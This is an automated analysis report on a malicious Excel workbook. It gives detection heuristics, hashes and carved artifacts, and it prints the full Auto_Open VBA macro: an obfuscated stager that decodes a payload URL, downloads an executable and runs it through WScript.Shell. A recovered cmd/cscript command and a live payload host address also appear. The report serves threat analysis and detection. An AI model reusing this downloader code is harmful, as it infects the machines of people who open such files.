Office (OOXML) malware analysis — malicious · 3017ff9746c8c492

MALICIOUS

Office (OOXML)

43.2 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-05-25

MD5: 3ccb05bcfd4ad6c57da2185b19df9fc9 SHA-1: 77887be9551a83f6947c9557f37d48fb4309b2ac SHA-256: 3017ff9746c8c4923fe1ea929c2e7ad4fcdb9bd37ae8173df8703ce5054f7a0e

512 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The embedded VBA macro contains an Auto_Open subroutine that utilizes WScript.Shell to execute a command. This command is a Base64-decoded stager that downloads and executes a payload from the URL http://5.189.132.254/voNDl.exe. The use of Shell() and CreateObject calls, along with a Base64-encoded stager, strongly indicates a downloader functionality.

Heuristics 14

Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR

Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT

This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

s = s + "       sWScript = sWScript + "".""" + vbCrLf
s = s + "       m = sWScript + ""Shell""" + vbCrLf
s = s + "       Execute(""l=m"") '37493" + vbCrLf

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
Path = "C:\Windows\System32\wscript.exe"
File = x + ":script1.vbs"
```
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER

VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
Matched line in script
```
s = s + "    ' available via .nodeTypedValue, which we can pass to BytesToStr()" + vbCrLf
s = s + "    varob = ""CreateObject"" '37493" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37493" + vbCrLf
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

s = s + "    ' available via .nodeTypedValue, which we can pass to BytesToStr()" + vbCrLf
s = s + "    varob = ""CreateObject"" '37493" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37493" + vbCrLf

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf

Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded OLE object medium OOXML_OLE_OBJECT

Document contains an embedded OLE object
Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL

An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://5.189.132.254/voNDl.exe Referenced by macro

Extracted artifacts 9

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11687 bytes
SHA-256: `69d785fe4190eb18164b23e6d134649217852a1a5222c48a3e5a320c59370193`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub Auto_Open() s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf s = s + "fsdfdsfs = ""aHR0cDovLzUuMTg5LjEzMi4yNTQvdm9ORGwuZXhlIA=="" " + vbCrLf s = s + "yulkytjtrhtjrkdsarjky =""bmljaGUuZXhl""" + vbCrLf s = s + "itype = ""bin""" + vbCrLf s = s + "itype = itype + ""."" '37493" + vbCrLf s = s + "itype = itype + ""base""" + vbCrLf s = s + "itype = itype + ""64"" '37493" + vbCrLf s = s + "dim after, path" + vbCrLf s = s + "after = ""later"" '37493" + vbCrLf s = s + "dim filestring" + vbCrLf s = s + "dim linkstring" + vbCrLf s = s + "Sub ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE) '37493" + vbCrLf s = s + " Dim sTextEncoding" + vbCrLf s = s + " if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""" + vbCrLf s = s + " ' Use an aux. XML document with a Base64-encoded element." + vbCrLf s = s + " ' Assigning the encoded text to .Text makes the decoded byte array '37493" + vbCrLf s = s + " ' available via .nodeTypedValue, which we can pass to BytesToStr()" + vbCrLf s = s + " varob = ""CreateObject"" '37493" + vbCrLf s = s + " Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37493" + vbCrLf s = s + " alxmd.DataType = itype" + vbCrLf s = s + " alxmd.Text = sBase64EncodedText '37493" + vbCrLf s = s + " aaax = ""ADODB.Stream""" + vbCrLf s = s + " byteArray = alxmd.NodeTypedValue" + vbCrLf s = s + " If LCase(sTextEncoding) = ""utf-16le"" then '37493" + vbCrLf s = s + " ' UTF-16 LE happens to be VBScript's internal encoding, so we can" + vbCrLf s = s + " ' take a shortcut and use CStr() to directly convert the byte array '37493" + vbCrLf s = s + " ' to a string." + vbCrLf s = s + " filestring = CStr(byteArray)" + vbCrLf s = s + " Else ' Convert the specified text encoding to a VBScript string." + vbCrLf s = s + " ' Create a binary stream and copy the input byte array to it." + vbCrLf s = s + " varob = ""CreateObject"" '37493" + vbCrLf s = s + " Execute(""Set baax = "" + varob + ""(aaax)"")" + vbCrLf s = s + " baax.Type = 1 ' adTypeBinary '37493" + vbCrLf s = s + " Execute(""baax."" + ""Open"")" + vbCrLf s = s + " baax.Write byteArray" + vbCrLf s = s + " ' Now change the type to text, set the encoding, and output the '37493" + vbCrLf s = s + " ' result as text. '37493" + vbCrLf s = s + " baax.Position = 0" + vbCrLf s = s + " baax.Type = 2 ' adTypeText" + vbCrLf s = s + " baax.CharSet = sTextEncoding" + vbCrLf s = s + " filestring = baax.ReadText" + vbCrLf s = s + " baax.Close" + vbCrLf s = s + " End If" + vbCrLf s = s + "end sub" + vbCrLf s = s + "Sub tse64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)" + vbCrLf s = s + " Dim sTextEncoding '37493" + vbCrLf s = s + " if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""" + vbCrLf s = s + " ' Use an aux. XML document with a Base64-encoded element. '37493" + vbCrLf s = s + " ' Assigning the encoded text to .Text makes the decoded byte array" + vbCrLf s = s + " ' available via .nodeTypedValue, which we can pass to BytesToStr() '37493" + vbCrLf s = s + " varob = ""CreateObject""" + vbCrLf s = s + " Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"")" + vbCrLf s = s + " alxmd.DataType = itype" + vbCrLf s = s + " alxmd.Text = sBase64EncodedText '37493" + vbCrLf s = s + " aaax = ""ADODB.Stream"" '37493" + vbCrLf s = s + " byteArray = alxmd.NodeTypedValue" + vbCrLf s = s + " If LCase(sTextEncoding) = ""utf-16le"" then" + vbCrLf s = s + " ' UTF-16 LE happens to be VBScript's internal encoding, so we can" + vbCrLf s = s + " ' take a shortcut and use CStr() to directly convert the byte array" + vbCrLf s = s + " ' to a string." + vbCrLf s = s + " linkstring = CStr(byteArray)" + vbCrLf s = s + " Else ' Convert the specified text encoding to a VBScript string." + vbCrLf s = s + " ' Create a binary stream and copy the input byte array to it. '37493" + vbCrLf s = s + " varob = ""CreateObject""" + vbCrLf s = s + " Execute(""Set baax = "" + varob + ""(aaax)"") '37493" + vbCrLf s = s + " baax.Type = 1 ' adTypeBinary" + vbCrLf s = s + " Execute(""baax."" + ""Open"") '37493" + vbCrLf s = s + " baax.Write byteArray" + vbCrLf s = s + " ' Now change the type to text, set the encoding, and output the " + vbCrLf s = s + " ' result as text. '37493" + vbCrLf s = s + " baax.Position = 0" + vbCrLf s = s + " baax.Type = 2 ' adTypeText" + vbCrLf s = s + " baax.CharSet = sTextEncoding" + vbCrLf s = s + " linkstring = baax.ReadText '37493" + vbCrLf s = s + " baax.Close" + vbCrLf s = s + " End If" + vbCrLf s = s + "end sub" + vbCrLf s = s + "call ase64Decode(yulkytjtrhtjrkdsarjky,False) 'filestring" + vbCrLf s = s + "call tse64Decode(fsdfdsfs,False) 'linkstring" + vbCrLf s = s + "Sub HTxTPDownload( aa, bb )" + vbCrLf s = s + " Set fso = CreateObject(""Scripting.FileSystemObject"") '37493" + vbCrLf s = s + " path = ""C:""" + vbCrLf s = s + " path = path + ""\program""" + vbCrLf s = s + " path = path + ""data""" + vbCrLf s = s + " path = path + ""\asc.txt""" + vbCrLf s = s + " If (fso.FileExists(path)) Then '37493" + vbCrLf s = s + " fso.DeleteFile(path)" + vbCrLf s = s + " msg = path & "" exists.""" + vbCrLf s = s + " Execute(""MyURL=aa:MyPath=bb"") '37493" + vbCrLf s = s + " sWScript = ""WScript""" + vbCrLf s = s + " sWScript = sWScript + "".""" + vbCrLf s = s + " m = sWScript + ""Shell""" + vbCrLf s = s + " Execute(""l=m"") '37493" + vbCrLf s = s + " set just_obj = CreateObject(l)" + vbCrLf s = s + " Else" + vbCrLf s = s + " msg = path & "" doesn't exist.""" + vbCrLf s = s + " End If" + vbCrLf s = s + " Dim i, objFile, objFSO, objHTTP, strFile, strMsg" + vbCrLf s = s + " Const ForReading = 1, ForWriting = 2, ForAppending = 8 '37493" + vbCrLf s = s + " Set objFSO = CreateObject( ""Scripting.FileSystemObject"" )" + vbCrLf s = s + " If objFSO.FolderExists( myPath ) Then" + vbCrLf s = s + " strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) + 1 ) )" + vbCrLf s = s + " ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, ""\"" ) - 1 ) ) Then" + vbCrLf s = s + " strFile = myPath" + vbCrLf s = s + " Else" + vbCrLf s = s + " WScript.Echo ""ERROR: Target folder not found."" '37493" + vbCrLf s = s + " Exit Sub" + vbCrLf s = s + " End If" + vbCrLf s = s + " Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" + vbCrLf s = s + " 'Set objHTTP = CreateObject( ""Microsoft.XMLHTTP"" )" + vbCrLf s = s + " dim stream_obj" + vbCrLf s = s + " ado = ""ADODB.Stream"" '37493" + vbCrLf s = s + " set stream_obj = CreateObject(ado)" + vbCrLf s = s + " Execute(""objHT"" + ""TP."" + ""Open """"GET"""", myURL, False"")" + vbCrLf s = s + " objHTTP.Send" + vbCrLf s = s + " stream_obj.type = 1" + vbCrLf s = s + " Execute(""stream_obj."" + ""open"")" + vbCrLf s = s + " stream_obj.write objHTTP.ResponseBody '37493" + vbCrLf s = s + " Execute(""stream_obj.save"" + ""tofile strFile, 2"")" + vbCrLf s = s + " ' Write the byte stream to the target file" + vbCrLf s = s + " 'For i = 1 To LenB( objHTTP.ResponseBody )" + vbCrLf s = s + " ' objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )" + vbCrLf s = s + " 'Next" + vbCrLf s = s + " ' Close the target file" + vbCrLf s = s + " 'objFile.Close( )" + vbCrLf s = s + "End Sub" + vbCrLf s = s + "yulkytjtrhtjrkdsarjky = filestring" + vbCrLf s = s + "yulkytjtrhtjrkdsarjky = ""C:"" + ""\Program"" + ""Data\"" + yulkytjtrhtjrkdsarjky" + vbCrLf s = s + "fsdfdsfs = linkstring '37493" + vbCrLf s = s + "HTxTPDownload fsdfdsfs, yulkytjtrhtjrkdsarjky" + vbCrLf s = s + "dim just_obj" + vbCrLf s = s + "RUNC = yulkytjtrhtjrkdsarjky" + vbCrLf s = s + "just_obj.exec RUNC" + vbCrLf On Error Resume Next Wscript = "Wscript.Shell" Set oknbvcfgh = CreateObject(Wscript) 'If Error WS Does not exist If Err.Number <> 0 Then DoesWSExist = False Else '37493 DoesWSExist = True '37493 End If On Error GoTo -1 j = ".S" + "hell" Range("A1:C1").Select Selection.Font.Name = "Arial" '37493 Selection.Font.Bold = True Selection.Font.Italic = True Selection.Interior.Color = vbGreen xzxz = "Ws" + "cr" + "ipt" + j x = "C:" x = x + "\program" x = x + "data" x = x + "\asc.txt" Dim i As Integer On Error GoTo Last 'ii = InputBox("Enter Value", "Enter Serial Numbers") For i = 1 To i ActiveCell.Value = i ActiveCell.Offset(1, 0).Activate Next i Last: On Error GoTo Handler '37493 If Target.Column = 1 And Target.Value <> "" Then Application.EnableEvents = False Target.Offset(0, 1) = Format(Now(), "dd-mm-yyyy hh:mm:ss") Application.EnableEvents = True End If '37493 Handler: Dim gfdgfdgdf As Object sdfsdfs = "Scripting." smallvar = "FileSystemObject" '37493 Set gfdgfdgdf = CreateObject(sdfsdfs + smallvar) Dim oFile As Object 'Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37493 Set oFile = gfdgfdgdf.CreateTextFile(x + ":script1.vbs") On Error Resume Next 'If Error WS Does not exist If Err.Number <> 0 Then End If On Error GoTo -1 oFile.WriteLine s 'oFile.Close Set gfdgfdgdf = Nothing Set oFile = Nothing '37493 Path = "C:\Windows\System32\wscript.exe" File = x + ":script1.vbs" x = Shell(Path + " " + File, vbNormalFocus) End Sub
`ooxml_oleobject_00.bin`	ooxml-ole-object	OOXML embedded OLE part: xl/embeddings/oleObject2.bin	8704 bytes
SHA-256: `2787a60a0241e52f0cb76e49405ba82f5bb0094253e067e4467fa68d0078e059`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37493, WScript = sWScript + "."
`ooxml_oleobject_00_ole10native_00.bin`	ole-package	OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native	6141 bytes
SHA-256: `1777836e05e7b3bcb0b10d0c676316de49f6d8c9c42f6b80453c78f50c1bacc0`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37493, WScript = sWScript + "."
`ooxml_oleobject_01.bin`	ooxml-ole-object	OOXML embedded OLE part: xl/embeddings/oleObject3.bin	5936 bytes
SHA-256: `d21fbb69c6b9b3209b0efab55a84abcdd733168e8f5e4b8d2b1612894c5c4bfc`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): cmd /c ren %tmp%\yy y.js&CSCRIpt %tmp%\y.js C
`ooxml_oleobject_02.bin`	ooxml-ole-object	OOXML embedded OLE part: xl/embeddings/oleObject1.bin	3584 bytes
SHA-256: `695b8287e8be9e672915f25f9651436d17180cbc70fd92b78a45136025127865`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): Wscript.Shell");
`ooxml_oleobject_02_ole10native_00.bin`	ole-package	OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native	934 bytes
SHA-256: `c8dec3e8c8566058182c8d96db22380307c82e23a5bafd541358aa4283203a3f`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): Wscript.Shell");
`ooxml_oleobject_03.bin`	ooxml-ole-object	OOXML embedded OLE part: xl/vbaProject.bin	31232 bytes
SHA-256: `b7c7d943255607d0173e29af525007b03117eae4f52e6b49471446c1ef486a3a`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript = "WScript", WScript = sWScript + ".", WScript + "Shell"
`emf_00.emf`	ooxml-emf	OOXML EMF part: xl/media/image1.emf	4968 bytes
SHA-256: `979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82`
`emf_01.emf`	ooxml-emf	OOXML EMF part: xl/media/image2.emf	1536 bytes
SHA-256: `4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f`

Open this report in the interactive analyzer, or submit your own file for analysis.